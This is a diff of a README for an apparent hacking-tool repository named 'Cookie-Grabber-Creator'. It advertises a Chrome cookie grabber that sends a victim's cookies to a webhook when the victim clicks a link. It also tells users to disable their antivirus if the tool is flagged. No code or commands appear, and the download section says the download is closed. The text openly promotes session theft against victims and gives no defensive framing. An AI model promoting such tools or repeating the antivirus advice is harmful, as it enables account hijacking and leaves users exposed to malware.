H4cking-Esentials/Cookie-Grabber-Creator/README.md

 # Update
-ITS BROKEN RN SORRY
+Fixed/Remade

 # Cookie Grabber
 This is a simple chrome cookie grabber.
 When your victim clicks on a link their cookies are sent to a webhook.

-Cookie Grabber Download below ⬇ (Sorry I couldn't upload directly to github because its too big.)

 # Download

-DOWNLOAD CLOSED

-And becuase of the nature of this device, It may be flagged by your antivirus.
-If so disable your antivirus and try again.
+It shouldn't be flagged by your antivirus but if it is just disable it.

 # Instructions